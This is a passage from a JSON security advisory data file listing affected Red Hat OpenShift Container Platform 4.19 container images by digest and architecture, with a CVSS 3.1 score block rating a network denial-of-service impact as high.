"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
